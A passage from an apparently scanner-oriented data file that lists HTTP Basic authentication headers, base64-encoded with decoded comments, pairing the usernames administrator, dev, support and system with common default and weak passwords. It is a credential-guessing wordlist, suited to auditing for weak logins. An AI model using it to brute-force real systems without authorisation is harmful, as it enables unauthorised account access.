1391 | - "BASIC YWRtaW5pc3RyYXRvcjpwQCQkdzByZA==" #administrator:p@$$w0rd
1392 | - "BASIC YWRtaW5pc3RyYXRvcjpQQHNzdzByZA==" #administrator:P@ssw0rd
1393 | - "BASIC YWRtaW5pc3RyYXRvcjpwQHNzdzByZA==" #administrator:p@ssw0rd
1394 | - "BASIC YWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=" #administrator:P@ssw0rd!
1395 | - "BASIC YWRtaW5pc3RyYXRvcjpwQHNzd29yZA==" #administrator:p@ssword
1396 | - "BASIC YWRtaW5pc3RyYXRvcjpwYTU1dzByZA==" #administrator:pa55w0rd
1397 | - "BASIC YWRtaW5pc3RyYXRvcjpwYXNz" #administrator:pass
1398 | - "BASIC YWRtaW5pc3RyYXRvcjpwYXNzdzByZA==" #administrator:passw0rd
1399 | - "BASIC YWRtaW5pc3RyYXRvcjpwYXNzd29yZA==" #administrator:password
1400 | - "BASIC YWRtaW5pc3RyYXRvcjpwYXNzd29yZDEyMw==" #administrator:password123
1401 | - "BASIC YWRtaW5pc3RyYXRvcjpxMXcyZTM=" #administrator:q1w2e3
1402 | - "BASIC YWRtaW5pc3RyYXRvcjpxMXcyZTNyNA==" #administrator:q1w2e3r4
1403 | - "BASIC YWRtaW5pc3RyYXRvcjpxMXcyZTNyNHQ1" #administrator:q1w2e3r4t5
1404 | - "BASIC YWRtaW5pc3RyYXRvcjpxYXp3c3hlZGM=" #administrator:qazwsxedc
1405 | - "BASIC YWRtaW5pc3RyYXRvcjpxd2UxMjM=" #administrator:qwe123
1406 | - "BASIC YWRtaW5pc3RyYXRvcjpxd2VyMTIzNA==" #administrator:qwer1234
1407 | - "BASIC YWRtaW5pc3RyYXRvcjpxd2VydHk=" #administrator:qwerty
1408 | - "BASIC YWRtaW5pc3RyYXRvcjpxd2VydHkxMjM=" #administrator:qwerty123
1409 | - "BASIC YWRtaW5pc3RyYXRvcjpyZWRoYXQ=" #administrator:redhat
1410 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290" #administrator:root
1411 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290MTIz" #administrator:root123
1412 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290MTIzNA==" #administrator:root1234
1413 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290QDEyMw==" #administrator:root@123
1414 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290cm9vdA==" #administrator:rootroot
1415 | - "BASIC YWRtaW5pc3RyYXRvcjpzZXJ2ZXI=" #administrator:server
1416 | - "BASIC YWRtaW5pc3RyYXRvcjpzdXBlcnVzZXI=" #administrator:superuser
1417 | - "BASIC YWRtaW5pc3RyYXRvcjpzeXN0ZW0=" #administrator:system
1418 | - "BASIC YWRtaW5pc3RyYXRvcjpUZXN0" #administrator:Test
1419 | - "BASIC YWRtaW5pc3RyYXRvcjp0ZXN0" #administrator:test
1420 | - "BASIC YWRtaW5pc3RyYXRvcjp0ZXN0MTIz" #administrator:test123
1421 | - "BASIC YWRtaW5pc3RyYXRvcjp0b29y" #administrator:toor
1422 | - "BASIC YWRtaW5pc3RyYXRvcjp1Ym50" #administrator:ubnt
1423 | - "BASIC YWRtaW5pc3RyYXRvcjp1YnVudHU=" #administrator:ubuntu
1424 | - "BASIC YWRtaW5pc3RyYXRvcjpVc2Vy" #administrator:User
1425 | - "BASIC YWRtaW5pc3RyYXRvcjp1c2Vy" #administrator:user
1426 | - "BASIC YWRtaW5pc3RyYXRvcjp2bXdhcmU=" #administrator:vmware
1427 | - "BASIC YWRtaW5pc3RyYXRvcjp3ZWxjb21l" #administrator:welcome
1428 | - "BASIC YWRtaW5pc3RyYXRvcjp3dWJhbw==" #administrator:wubao
1429 | - "BASIC YWRtaW5pc3RyYXRvcjp6YXExMndzeA==" #administrator:zaq12wsx
1430 | - "BASIC YWRtaW5pc3RyYXRvcjp6eGN2Ym4=" #administrator:zxcvbn
1431 | - "BASIC YWRtaW5pc3RyYXRvcjp6eGN2Ym5t" #administrator:zxcvbnm
1432 | - "BASIC YWRtaW5pc3RyYXRvcjpjaGFuZ2VpdA==" #administrator:changeit
1433 | - "BASIC ZGV2Og==" #dev:
1434 | - "BASIC ZGV2OiFRQVoyd3N4" #dev:!QAZ2wsx
1435 | - "BASIC ZGV2OiFxYXpAd3N4" #dev:!qaz@wsx
1436 | - "BASIC ZGV2OjAwMDA=" #dev:0000
1437 | - "BASIC ZGV2OjAwMDAwMA==" #dev:000000
1438 | - "BASIC ZGV2OjAwMDAwMDA=" #dev:0000000
1439 | - "BASIC ZGV2OjAwMDAwMDAw" #dev:00000000
1440 | - "BASIC ZGV2OjA5ODc2NTQzMjE=" #dev:0987654321
1441 | - "BASIC ZGV2OjA=" #dev:0
1442 | - "BASIC ZGV2OjE=" #dev:1
1443 | - "BASIC ZGV2OjI=" #dev:2
1444 | - "BASIC ZGV2OjM=" #dev:3
1445 | - "BASIC ZGV2OjQ=" #dev:4
1446 | - "BASIC ZGV2OjU=" #dev:5
1447 | - "BASIC ZGV2OjY=" #dev:6
1448 | - "BASIC ZGV2Ojc=" #dev:7
1449 | - "BASIC ZGV2Ojg=" #dev:8
1450 | - "BASIC ZGV2Ojk=" #dev:9
1451 | - "BASIC ZGV2OjExMTE=" #dev:1111
1452 | - "BASIC ZGV2OjExMTEx" #dev:11111
1453 | - "BASIC ZGV2OjExMTExMQ==" #dev:111111
1454 | - "BASIC ZGV2OjExMTExMTE=" #dev:1111111
1455 | - "BASIC ZGV2OjExMTExMTEx" #dev:11111111
1456 | - "BASIC ZGV2OjExMjIzMw==" #dev:112233
1457 | - "BASIC ZGV2OjEyMTIxMg==" #dev:121212
1458 | - "BASIC ZGV2OjEyMw==" #dev:123
1459 | - "BASIC ZGV2OjEyMzEyMw==" #dev:123123
1460 | - "BASIC ZGV2OjEyMzMyMQ==" #dev:123321
1461 | - "BASIC ZGV2OjEyMzQ=" #dev:1234
1462 | - "BASIC ZGV2OjEyMzQ1" #dev:12345
1463 | - "BASIC ZGV2OjEyMzQ1Ng==" #dev:123456
1464 | - "BASIC ZGV2OjEyMzQ1Njc=" #dev:1234567
1465 | - "BASIC ZGV2OjEyMzQ1Njc4" #dev:12345678
1466 | - "BASIC ZGV2OjEyMzQ1Njc4OQ==" #dev:123456789
1467 | - "BASIC ZGV2OjEyMzQ1Njc4OTA=" #dev:1234567890
1468 | - "BASIC ZGV2OjEyMzRhYmNk" #dev:1234abcd
1469 | - "BASIC ZGV2OjEyMzRxd2Vy" #dev:1234qwer
1470 | - "BASIC ZGV2OjEyM2FiYw==" #dev:123abc
1471 | - "BASIC ZGV2OjEyM2FzZA==" #dev:123asd
1472 | - "BASIC ZGV2OjEyM3F3ZQ==" #dev:123qwe
1473 | - "BASIC ZGV2OjEyM3F3ZWFzZA==" #dev:123qweasd
1474 | - "BASIC ZGV2OjEycXdhc3p4" #dev:12qwaszx
1475 | - "BASIC ZGV2OjFlMmUzZQ==" #dev:1e2e3e
1476 | - "BASIC ZGV2OjFlMmUzZTRl" #dev:1e2e3e4e
1477 | - "BASIC ZGV2OjFxMnEzcQ==" #dev:1q2q3q
1478 | - "BASIC ZGV2OjFxMnEzcTRx" #dev:1q2q3q4q
1479 | - "BASIC ZGV2OjFxMnczZQ==" #dev:1q2w3e
1480 | - "BASIC ZGV2OjFxMnczZTRy" #dev:1q2w3e4r
1481 | - "BASIC ZGV2OjFxMnczZTRyNXQ=" #dev:1q2w3e4r5t
1482 | - "BASIC ZGV2OjFxYXoyd3N4" #dev:1qaz2wsx
1483 | - "BASIC ZGV2OjFxYXoyd3N4M2VkYw==" #dev:1qaz2wsx3edc
1484 | - "BASIC ZGV2OjFxYXp4c3cy" #dev:1qazxsw2
1485 | - "BASIC ZGV2OjFxYXpYU1dA" #dev:1qazXSW@
1486 | - "BASIC ZGV2OjF3MnEhV0BR" #dev:1w2q!W@Q
1487 | - "BASIC ZGV2OjF3Mnczdw==" #dev:1w2w3w
1488 | - "BASIC ZGV2OjF3MnczdzR3" #dev:1w2w3w4w
1489 | - "BASIC ZGV2OjU0MzIx" #dev:54321
1490 | - "BASIC ZGV2OjY1NDMyMQ==" #dev:654321
1491 | - "BASIC ZGV2Ojg4ODg4OA==" #dev:888888
1492 | - "BASIC ZGV2OmE=" #dev:a
1493 | - "BASIC ZGV2OmFiYzEyMw==" #dev:abc123
1494 | - "BASIC ZGV2OmFiY2QxMjM0" #dev:abcd1234
1495 | - "BASIC ZGV2OkFkbWlu" #dev:Admin
1496 | - "BASIC ZGV2OmFkbWlu" #dev:admin
1497 | - "BASIC ZGV2OmFkbWluIUA=" #dev:admin!@
1498 | - "BASIC ZGV2OmFkbWluMQ==" #dev:admin1
1499 | - "BASIC ZGV2OmFkbWluMTI=" #dev:admin12
1500 | - "BASIC ZGV2OmFkbWluMTIz" #dev:admin123
1501 | - "BASIC ZGV2OmFkbWluMTIzNDU2" #dev:admin123456
1502 | - "BASIC ZGV2OmFkbWluaXN0cmF0b3I=" #dev:administrator
1503 | - "BASIC ZGV2OmFscGluZQ==" #dev:alpine
1504 | - "BASIC ZGV2OmFzZDEyMw==" #dev:asd123
1505 | - "BASIC ZGV2OmFzZGY=" #dev:asdf
1506 | - "BASIC ZGV2OmFzZGYxMjM0" #dev:asdf1234
1507 | - "BASIC ZGV2OmFzZGZnaA==" #dev:asdfgh
1508 | - "BASIC ZGV2OmNlbnRvcw==" #dev:centos
1509 | - "BASIC ZGV2OmNoYW5nZW1l" #dev:changeme
1510 | - "BASIC ZGV2OmNpc2Nv" #dev:cisco
1511 | - "BASIC ZGV2OmNpc2NvMTIz" #dev:cisco123
1512 | - "BASIC ZGV2OmRlZmF1bHQ=" #dev:default
1513 | - "BASIC ZGV2OmlkYyFA" #dev:idc!@
1514 | - "BASIC ZGV2OmppYW1pbWE=" #dev:jiamima
1515 | - "BASIC ZGV2OmxldG1laW4=" #dev:letmein
1516 | - "BASIC ZGV2OmxpbnV4" #dev:linux
1517 | - "BASIC ZGV2Om1hbmFnZXI=" #dev:manager
1518 | - "BASIC ZGV2Om1hc3Rlcg==" #dev:master
1519 | - "BASIC ZGV2Om9yYWNsZQ==" #dev:oracle
1520 | - "BASIC ZGV2OnBAJCR3MHJk" #dev:p@$$w0rd
1521 | - "BASIC ZGV2OlBAc3N3MHJk" #dev:P@ssw0rd
1522 | - "BASIC ZGV2OnBAc3N3MHJk" #dev:p@ssw0rd
1523 | - "BASIC ZGV2OlBAc3N3MHJkIQ==" #dev:P@ssw0rd!
1524 | - "BASIC ZGV2OnBAc3N3b3Jk" #dev:p@ssword
1525 | - "BASIC ZGV2OnBhNTV3MHJk" #dev:pa55w0rd
1526 | - "BASIC ZGV2OnBhc3M=" #dev:pass
1527 | - "BASIC ZGV2OnBhc3N3MHJk" #dev:passw0rd
1528 | - "BASIC ZGV2OnBhc3N3b3Jk" #dev:password
1529 | - "BASIC ZGV2OnBhc3N3b3JkMTIz" #dev:password123
1530 | - "BASIC ZGV2OnExdzJlMw==" #dev:q1w2e3
1531 | - "BASIC ZGV2OnExdzJlM3I0" #dev:q1w2e3r4
1532 | - "BASIC ZGV2OnExdzJlM3I0dDU=" #dev:q1w2e3r4t5
1533 | - "BASIC ZGV2OnFhendzeGVkYw==" #dev:qazwsxedc
1534 | - "BASIC ZGV2OnF3ZTEyMw==" #dev:qwe123
1535 | - "BASIC ZGV2OnF3ZXIxMjM0" #dev:qwer1234
1536 | - "BASIC ZGV2OnF3ZXJ0eQ==" #dev:qwerty
1537 | - "BASIC ZGV2OnF3ZXJ0eTEyMw==" #dev:qwerty123
1538 | - "BASIC ZGV2OnJlZGhhdA==" #dev:redhat
1539 | - "BASIC ZGV2OnJvb3Q=" #dev:root
1540 | - "BASIC ZGV2OnJvb3QxMjM=" #dev:root123
1541 | - "BASIC ZGV2OnJvb3QxMjM0" #dev:root1234
1542 | - "BASIC ZGV2OnJvb3RAMTIz" #dev:root@123
1543 | - "BASIC ZGV2OnJvb3Ryb290" #dev:rootroot
1544 | - "BASIC ZGV2OnNlcnZlcg==" #dev:server
1545 | - "BASIC ZGV2OnN1cGVydXNlcg==" #dev:superuser
1546 | - "BASIC ZGV2OnN5c3RlbQ==" #dev:system
1547 | - "BASIC ZGV2OlRlc3Q=" #dev:Test
1548 | - "BASIC ZGV2OnRlc3Q=" #dev:test
1549 | - "BASIC ZGV2OnRlc3QxMjM=" #dev:test123
1550 | - "BASIC ZGV2OnRvb3I=" #dev:toor
1551 | - "BASIC ZGV2OnVibnQ=" #dev:ubnt
1552 | - "BASIC ZGV2OnVidW50dQ==" #dev:ubuntu
1553 | - "BASIC ZGV2OlVzZXI=" #dev:User
1554 | - "BASIC ZGV2OnVzZXI=" #dev:user
1555 | - "BASIC ZGV2OnZtd2FyZQ==" #dev:vmware
1556 | - "BASIC ZGV2OndlbGNvbWU=" #dev:welcome
1557 | - "BASIC ZGV2Ond1YmFv" #dev:wubao
1558 | - "BASIC ZGV2OnphcTEyd3N4" #dev:zaq12wsx
1559 | - "BASIC ZGV2Onp4Y3Zibg==" #dev:zxcvbn
1560 | - "BASIC ZGV2Onp4Y3Zibm0=" #dev:zxcvbnm
1561 | - "BASIC ZGV2OmNoYW5nZWl0" #dev:changeit
1562 | - "BASIC c3VwcG9ydDo=" #support:
1563 | - "BASIC c3VwcG9ydDohUUFaMndzeA==" #support:!QAZ2wsx
1564 | - "BASIC c3VwcG9ydDohcWF6QHdzeA==" #support:!qaz@wsx
1565 | - "BASIC c3VwcG9ydDowMDAw" #support:0000
1566 | - "BASIC c3VwcG9ydDowMDAwMDA=" #support:000000
1567 | - "BASIC c3VwcG9ydDowMDAwMDAw" #support:0000000
1568 | - "BASIC c3VwcG9ydDowMDAwMDAwMA==" #support:00000000
1569 | - "BASIC c3VwcG9ydDowOTg3NjU0MzIx" #support:0987654321
1570 | - "BASIC c3VwcG9ydDow" #support:0
1571 | - "BASIC c3VwcG9ydDox" #support:1
1572 | - "BASIC c3VwcG9ydDoy" #support:2
1573 | - "BASIC c3VwcG9ydDoz" #support:3
1574 | - "BASIC c3VwcG9ydDo0" #support:4
1575 | - "BASIC c3VwcG9ydDo1" #support:5
1576 | - "BASIC c3VwcG9ydDo2" #support:6
1577 | - "BASIC c3VwcG9ydDo3" #support:7
1578 | - "BASIC c3VwcG9ydDo4" #support:8
1579 | - "BASIC c3VwcG9ydDo5" #support:9
1580 | - "BASIC c3VwcG9ydDoxMTEx" #support:1111
1581 | - "BASIC c3VwcG9ydDoxMTExMQ==" #support:11111
1582 | - "BASIC c3VwcG9ydDoxMTExMTE=" #support:111111
1583 | - "BASIC c3VwcG9ydDoxMTExMTEx" #support:1111111
1584 | - "BASIC c3VwcG9ydDoxMTExMTExMQ==" #support:11111111
1585 | - "BASIC c3VwcG9ydDoxMTIyMzM=" #support:112233
1586 | - "BASIC c3VwcG9ydDoxMjEyMTI=" #support:121212
1587 | - "BASIC c3VwcG9ydDoxMjM=" #support:123
1588 | - "BASIC c3VwcG9ydDoxMjMxMjM=" #support:123123
1589 | - "BASIC c3VwcG9ydDoxMjMzMjE=" #support:123321
1590 | - "BASIC c3VwcG9ydDoxMjM0" #support:1234
1591 | - "BASIC c3VwcG9ydDoxMjM0NQ==" #support:12345
1592 | - "BASIC c3VwcG9ydDoxMjM0NTY=" #support:123456
1593 | - "BASIC c3VwcG9ydDoxMjM0NTY3" #support:1234567
1594 | - "BASIC c3VwcG9ydDoxMjM0NTY3OA==" #support:12345678
1595 | - "BASIC c3VwcG9ydDoxMjM0NTY3ODk=" #support:123456789
1596 | - "BASIC c3VwcG9ydDoxMjM0NTY3ODkw" #support:1234567890
1597 | - "BASIC c3VwcG9ydDoxMjM0YWJjZA==" #support:1234abcd
1598 | - "BASIC c3VwcG9ydDoxMjM0cXdlcg==" #support:1234qwer
1599 | - "BASIC c3VwcG9ydDoxMjNhYmM=" #support:123abc
1600 | - "BASIC c3VwcG9ydDoxMjNhc2Q=" #support:123asd
1601 | - "BASIC c3VwcG9ydDoxMjNxd2U=" #support:123qwe
1602 | - "BASIC c3VwcG9ydDoxMjNxd2Vhc2Q=" #support:123qweasd
1603 | - "BASIC c3VwcG9ydDoxMnF3YXN6eA==" #support:12qwaszx
1604 | - "BASIC c3VwcG9ydDoxZTJlM2U=" #support:1e2e3e
1605 | - "BASIC c3VwcG9ydDoxZTJlM2U0ZQ==" #support:1e2e3e4e
1606 | - "BASIC c3VwcG9ydDoxcTJxM3E=" #support:1q2q3q
1607 | - "BASIC c3VwcG9ydDoxcTJxM3E0cQ==" #support:1q2q3q4q
1608 | - "BASIC c3VwcG9ydDoxcTJ3M2U=" #support:1q2w3e
1609 | - "BASIC c3VwcG9ydDoxcTJ3M2U0cg==" #support:1q2w3e4r
1610 | - "BASIC c3VwcG9ydDoxcTJ3M2U0cjV0" #support:1q2w3e4r5t
1611 | - "BASIC c3VwcG9ydDoxcWF6MndzeA==" #support:1qaz2wsx
1612 | - "BASIC c3VwcG9ydDoxcWF6MndzeDNlZGM=" #support:1qaz2wsx3edc
1613 | - "BASIC c3VwcG9ydDoxcWF6eHN3Mg==" #support:1qazxsw2
1614 | - "BASIC c3VwcG9ydDoxcWF6WFNXQA==" #support:1qazXSW@
1615 | - "BASIC c3VwcG9ydDoxdzJxIVdAUQ==" #support:1w2q!W@Q
1616 | - "BASIC c3VwcG9ydDoxdzJ3M3c=" #support:1w2w3w
1617 | - "BASIC c3VwcG9ydDoxdzJ3M3c0dw==" #support:1w2w3w4w
1618 | - "BASIC c3VwcG9ydDo1NDMyMQ==" #support:54321
1619 | - "BASIC c3VwcG9ydDo2NTQzMjE=" #support:654321
1620 | - "BASIC c3VwcG9ydDo4ODg4ODg=" #support:888888
1621 | - "BASIC c3VwcG9ydDph" #support:a
1622 | - "BASIC c3VwcG9ydDphYmMxMjM=" #support:abc123
1623 | - "BASIC c3VwcG9ydDphYmNkMTIzNA==" #support:abcd1234
1624 | - "BASIC c3VwcG9ydDpBZG1pbg==" #support:Admin
1625 | - "BASIC c3VwcG9ydDphZG1pbg==" #support:admin
1626 | - "BASIC c3VwcG9ydDphZG1pbiFA" #support:admin!@
1627 | - "BASIC c3VwcG9ydDphZG1pbjE=" #support:admin1
1628 | - "BASIC c3VwcG9ydDphZG1pbjEy" #support:admin12
1629 | - "BASIC c3VwcG9ydDphZG1pbjEyMw==" #support:admin123
1630 | - "BASIC c3VwcG9ydDphZG1pbjEyMzQ1Ng==" #support:admin123456
1631 | - "BASIC c3VwcG9ydDphZG1pbmlzdHJhdG9y" #support:administrator
1632 | - "BASIC c3VwcG9ydDphbHBpbmU=" #support:alpine
1633 | - "BASIC c3VwcG9ydDphc2QxMjM=" #support:asd123
1634 | - "BASIC c3VwcG9ydDphc2Rm" #support:asdf
1635 | - "BASIC c3VwcG9ydDphc2RmMTIzNA==" #support:asdf1234
1636 | - "BASIC c3VwcG9ydDphc2RmZ2g=" #support:asdfgh
1637 | - "BASIC c3VwcG9ydDpjZW50b3M=" #support:centos
1638 | - "BASIC c3VwcG9ydDpjaGFuZ2VtZQ==" #support:changeme
1639 | - "BASIC c3VwcG9ydDpjaXNjbw==" #support:cisco
1640 | - "BASIC c3VwcG9ydDpjaXNjbzEyMw==" #support:cisco123
1641 | - "BASIC c3VwcG9ydDpkZWZhdWx0" #support:default
1642 | - "BASIC c3VwcG9ydDppZGMhQA==" #support:idc!@
1643 | - "BASIC c3VwcG9ydDpqaWFtaW1h" #support:jiamima
1644 | - "BASIC c3VwcG9ydDpsZXRtZWlu" #support:letmein
1645 | - "BASIC c3VwcG9ydDpsaW51eA==" #support:linux
1646 | - "BASIC c3VwcG9ydDptYW5hZ2Vy" #support:manager
1647 | - "BASIC c3VwcG9ydDptYXN0ZXI=" #support:master
1648 | - "BASIC c3VwcG9ydDpvcmFjbGU=" #support:oracle
1649 | - "BASIC c3VwcG9ydDpwQCQkdzByZA==" #support:p@$$w0rd
1650 | - "BASIC c3VwcG9ydDpQQHNzdzByZA==" #support:P@ssw0rd
1651 | - "BASIC c3VwcG9ydDpwQHNzdzByZA==" #support:p@ssw0rd
1652 | - "BASIC c3VwcG9ydDpQQHNzdzByZCE=" #support:P@ssw0rd!
1653 | - "BASIC c3VwcG9ydDpwQHNzd29yZA==" #support:p@ssword
1654 | - "BASIC c3VwcG9ydDpwYTU1dzByZA==" #support:pa55w0rd
1655 | - "BASIC c3VwcG9ydDpwYXNz" #support:pass
1656 | - "BASIC c3VwcG9ydDpwYXNzdzByZA==" #support:passw0rd
1657 | - "BASIC c3VwcG9ydDpwYXNzd29yZA==" #support:password
1658 | - "BASIC c3VwcG9ydDpwYXNzd29yZDEyMw==" #support:password123
1659 | - "BASIC c3VwcG9ydDpxMXcyZTM=" #support:q1w2e3
1660 | - "BASIC c3VwcG9ydDpxMXcyZTNyNA==" #support:q1w2e3r4
1661 | - "BASIC c3VwcG9ydDpxMXcyZTNyNHQ1" #support:q1w2e3r4t5
1662 | - "BASIC c3VwcG9ydDpxYXp3c3hlZGM=" #support:qazwsxedc
1663 | - "BASIC c3VwcG9ydDpxd2UxMjM=" #support:qwe123
1664 | - "BASIC c3VwcG9ydDpxd2VyMTIzNA==" #support:qwer1234
1665 | - "BASIC c3VwcG9ydDpxd2VydHk=" #support:qwerty
1666 | - "BASIC c3VwcG9ydDpxd2VydHkxMjM=" #support:qwerty123
1667 | - "BASIC c3VwcG9ydDpyZWRoYXQ=" #support:redhat
1668 | - "BASIC c3VwcG9ydDpyb290" #support:root
1669 | - "BASIC c3VwcG9ydDpyb290MTIz" #support:root123
1670 | - "BASIC c3VwcG9ydDpyb290MTIzNA==" #support:root1234
1671 | - "BASIC c3VwcG9ydDpyb290QDEyMw==" #support:root@123
1672 | - "BASIC c3VwcG9ydDpyb290cm9vdA==" #support:rootroot
1673 | - "BASIC c3VwcG9ydDpzZXJ2ZXI=" #support:server
1674 | - "BASIC c3VwcG9ydDpzdXBlcnVzZXI=" #support:superuser
1675 | - "BASIC c3VwcG9ydDpzeXN0ZW0=" #support:system
1676 | - "BASIC c3VwcG9ydDpUZXN0" #support:Test
1677 | - "BASIC c3VwcG9ydDp0ZXN0" #support:test
1678 | - "BASIC c3VwcG9ydDp0ZXN0MTIz" #support:test123
1679 | - "BASIC c3VwcG9ydDp0b29y" #support:toor
1680 | - "BASIC c3VwcG9ydDp1Ym50" #support:ubnt
1681 | - "BASIC c3VwcG9ydDp1YnVudHU=" #support:ubuntu
1682 | - "BASIC c3VwcG9ydDpVc2Vy" #support:User
1683 | - "BASIC c3VwcG9ydDp1c2Vy" #support:user
1684 | - "BASIC c3VwcG9ydDp2bXdhcmU=" #support:vmware
1685 | - "BASIC c3VwcG9ydDp3ZWxjb21l" #support:welcome
1686 | - "BASIC c3VwcG9ydDp3dWJhbw==" #support:wubao
1687 | - "BASIC c3VwcG9ydDp6YXExMndzeA==" #support:zaq12wsx
1688 | - "BASIC c3VwcG9ydDp6eGN2Ym4=" #support:zxcvbn
1689 | - "BASIC c3VwcG9ydDp6eGN2Ym5t" #support:zxcvbnm
1690 | - "BASIC c3VwcG9ydDpjaGFuZ2VpdA==" #support:changeit
1691 | - "BASIC c3lzdGVtOg==" #system:
1692 | - "BASIC c3lzdGVtOiFRQVoyd3N4" #system:!QAZ2wsx
1693 | - "BASIC c3lzdGVtOiFxYXpAd3N4" #system:!qaz@wsx
1694 | - "BASIC c3lzdGVtOjAwMDA=" #system:0000
1695 | - "BASIC c3lzdGVtOjAwMDAwMA==" #system:000000
1696 | - "BASIC c3lzdGVtOjAwMDAwMDA=" #system:0000000
1697 | - "BASIC c3lzdGVtOjAwMDAwMDAw" #system:00000000
1698 | - "BASIC c3lzdGVtOjA5ODc2NTQzMjE=" #system:0987654321
1699 | - "BASIC c3lzdGVtOjA=" #system:0
1700 | - "BASIC c3lzdGVtOjE=" #system:1
1701 | - "BASIC c3lzdGVtOjI=" #system:2
1702 | - "BASIC c3lzdGVtOjM=" #system:3
1703 | - "BASIC c3lzdGVtOjQ=" #system:4
1704 | - "BASIC c3lzdGVtOjU=" #system:5
1705 | - "BASIC c3lzdGVtOjY=" #system:6
1706 | - "BASIC c3lzdGVtOjc=" #system:7
1707 | - "BASIC c3lzdGVtOjg=" #system:8
1708 | - "BASIC c3lzdGVtOjk=" #system:9
1709 | - "BASIC c3lzdGVtOjExMTE=" #system:1111
1710 | - "BASIC c3lzdGVtOjExMTEx" #system:11111
1711 | - "BASIC c3lzdGVtOjExMTExMQ==" #system:111111
1712 | - "BASIC c3lzdGVtOjExMTExMTE=" #system:1111111
1713 | - "BASIC c3lzdGVtOjExMTExMTEx" #system:11111111
1714 | - "BASIC c3lzdGVtOjExMjIzMw==" #system:112233
1715 | - "BASIC c3lzdGVtOjEyMTIxMg==" #system:121212
1716 | - "BASIC c3lzdGVtOjEyMw==" #system:123
1717 | - "BASIC c3lzdGVtOjEyMzEyMw==" #system:123123
1718 | - "BASIC c3lzdGVtOjEyMzMyMQ==" #system:123321
1719 | - "BASIC c3lzdGVtOjEyMzQ=" #system:1234
1720 | - "BASIC c3lzdGVtOjEyMzQ1" #system:12345
1721 | - "BASIC c3lzdGVtOjEyMzQ1Ng==" #system:123456
1722 | - "BASIC c3lzdGVtOjEyMzQ1Njc=" #system:1234567
1723 | - "BASIC c3lzdGVtOjEyMzQ1Njc4" #system:12345678
1724 | - "BASIC c3lzdGVtOjEyMzQ1Njc4OQ==" #system:123456789
1725 | - "BASIC c3lzdGVtOjEyMzQ1Njc4OTA=" #system:1234567890
1726 | - "BASIC c3lzdGVtOjEyMzRhYmNk" #system:1234abcd
1727 | - "BASIC c3lzdGVtOjEyMzRxd2Vy" #system:1234qwer
1728 | - "BASIC c3lzdGVtOjEyM2FiYw==" #system:123abc
1729 | - "BASIC c3lzdGVtOjEyM2FzZA==" #system:123asd
1730 | - "BASIC c3lzdGVtOjEyM3F3ZQ==" #system:123qwe
1731 | - "BASIC c3lzdGVtOjEyM3F3ZWFzZA==" #system:123qweasd
1732 | - "BASIC c3lzdGVtOjEycXdhc3p4" #system:12qwaszx
1733 | - "BASIC c3lzdGVtOjFlMmUzZQ==" #system:1e2e3e
1734 | - "BASIC c3lzdGVtOjFlMmUzZTRl" #system:1e2e3e4e
1735 | - "BASIC c3lzdGVtOjFxMnEzcQ==" #system:1q2q3q
1736 | - "BASIC c3lzdGVtOjFxMnEzcTRx" #system:1q2q3q4q
1737 | - "BASIC c3lzdGVtOjFxMnczZQ==" #system:1q2w3e
1738 | - "BASIC c3lzdGVtOjFxMnczZTRy" #system:1q2w3e4r
1739 | - "BASIC c3lzdGVtOjFxMnczZTRyNXQ=" #system:1q2w3e4r5t
1740 | - "BASIC c3lzdGVtOjFxYXoyd3N4" #system:1qaz2wsx
1741 | - "BASIC c3lzdGVtOjFxYXoyd3N4M2VkYw==" #system:1qaz2wsx3edc
1742 | - "BASIC c3lzdGVtOjFxYXp4c3cy" #system:1qazxsw2
1743 | - "BASIC c3lzdGVtOjFxYXpYU1dA" #system:1qazXSW@
1744 | - "BASIC c3lzdGVtOjF3MnEhV0BR" #system:1w2q!W@Q
1745 | - "BASIC c3lzdGVtOjF3Mnczdw==" #system:1w2w3w
1746 | - "BASIC c3lzdGVtOjF3MnczdzR3" #system:1w2w3w4w
1747 | - "BASIC c3lzdGVtOjU0MzIx" #system:54321
1748 | - "BASIC c3lzdGVtOjY1NDMyMQ==" #system:654321
1749 | - "BASIC c3lzdGVtOjg4ODg4OA==" #system:888888
1750 | - "BASIC c3lzdGVtOmE=" #system:a
1751 | - "BASIC c3lzdGVtOmFiYzEyMw==" #system:abc123
1752 | - "BASIC c3lzdGVtOmFiY2QxMjM0" #system:abcd1234
1753 | - "BASIC c3lzdGVtOkFkbWlu" #system:Admin
1754 | - "BASIC c3lzdGVtOmFkbWlu" #system:admin
1755 | - "BASIC c3lzdGVtOmFkbWluIUA=" #system:admin!@
1756 | - "BASIC c3lzdGVtOmFkbWluMQ==" #system:admin1
1757 | - "BASIC c3lzdGVtOmFkbWluMTI=" #system:admin12
1758 | - "BASIC c3lzdGVtOmFkbWluMTIz" #system:admin123
1759 | - "BASIC c3lzdGVtOmFkbWluMTIzNDU2" #system:admin123456
1760 | - "BASIC c3lzdGVtOmFkbWluaXN0cmF0b3I=" #system:administrator
1761 | - "BASIC c3lzdGVtOmFscGluZQ==" #system:alpine
1762 | - "BASIC c3lzdGVtOmFzZDEyMw==" #system:asd123
1763 | - "BASIC c3lzdGVtOmFzZGY=" #system:asdf
1764 | - "BASIC c3lzdGVtOmFzZGYxMjM0" #system:asdf1234
1765 | - "BASIC c3lzdGVtOmFzZGZnaA==" #system:asdfgh
1766 | - "BASIC c3lzdGVtOmNlbnRvcw==" #system:centos
1767 | - "BASIC c3lzdGVtOmNoYW5nZW1l" #system:changeme
1768 | - "BASIC c3lzdGVtOmNpc2Nv" #system:cisco
1769 | - "BASIC c3lzdGVtOmNpc2NvMTIz" #system:cisco123
1770 | - "BASIC c3lzdGVtOmRlZmF1bHQ=" #system:default
1771 | - "BASIC c3lzdGVtOmlkYyFA" #system:idc!@
1772 | - "BASIC c3lzdGVtOmppYW1pbWE=" #system:jiamima
1773 | - "BASIC c3lzdGVtOmxldG1laW4=" #system:letmein
1774 | - "BASIC c3lzdGVtOmxpbnV4" #system:linux
1775 | - "BASIC c3lzdGVtOm1hbmFnZXI=" #system:manager
1776 | - "BASIC c3lzdGVtOm1hc3Rlcg==" #system:master
1777 | - "BASIC c3lzdGVtOm9yYWNsZQ==" #system:oracle
1778 | - "BASIC c3lzdGVtOnBAJCR3MHJk" #system:p@$$w0rd
1779 | - "BASIC c3lzdGVtOlBAc3N3MHJk" #system:P@ssw0rd
